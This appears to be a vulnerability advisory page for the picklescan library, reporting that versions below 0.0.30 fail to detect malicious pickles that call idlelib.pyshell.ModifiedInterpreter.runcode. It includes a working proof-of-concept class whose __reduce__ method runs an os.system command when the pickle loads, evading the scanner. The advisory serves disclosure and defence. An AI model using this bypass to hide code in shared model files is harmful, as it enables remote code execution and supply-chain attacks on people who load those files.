An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS0zZ2Y1LWN4cTktdzIyM84ABLcx

Moderate

Picklescan is missing detection when calling built-in python idlelib.pyshell.ModifiedInterpreter.runcode

Affected Packages Affected Versions Fixed Versions
pypi:picklescan
PURL: pkg:pypi/picklescan
< 0.0.30 0.0.30
2 Dependent packages
82 Dependent repositories
55,786 Downloads last month

Affected Version Ranges

All affected versions

0.0.1, 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7, 0.0.8, 0.0.9, 0.0.10, 0.0.11, 0.0.12, 0.0.13, 0.0.14, 0.0.15, 0.0.16, 0.0.17, 0.0.18, 0.0.19, 0.0.20, 0.0.21, 0.0.22, 0.0.23, 0.0.24, 0.0.25, 0.0.26, 0.0.27, 0.0.28, 0.0.29

All unaffected versions

0.0.30

Summary

Using idlelib.pyshell.ModifiedInterpreter.runcode function, which is a built-in python library function to execute remote pickle file.

Details

The attack payload executes in the following steps:

First, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcode function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.

PoC


from idlelib.pyshell import ModifiedInterpreter
from types import SimpleNamespace

class EvilIdlelibPyshellModifiedInterpreterRuncode:
    def __reduce__(self):
        payload = "__import__('os').system('whoami')"
        fake_self = SimpleNamespace(
            locals={},
            tkconsole=SimpleNamespace(
                executing=False,
                beginexecuting=str,
                canceled=False,
                closing=False,
                showtraceback=str,
                endexecuting=str,
                stderr=None,
                text=SimpleNamespace(),
                getvar=str
            ),
            rpcclt=None,
            debugger=None,
            checklinecache=str,
            active_seq=None,
            showtraceback=str,
            canceled=False,
            closing=False
        )
        return ModifiedInterpreter.runcode, (fake_self, payload)

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Corresponding

https://github.com/FredericDT
https://github.com/Qhaoduoyu

References: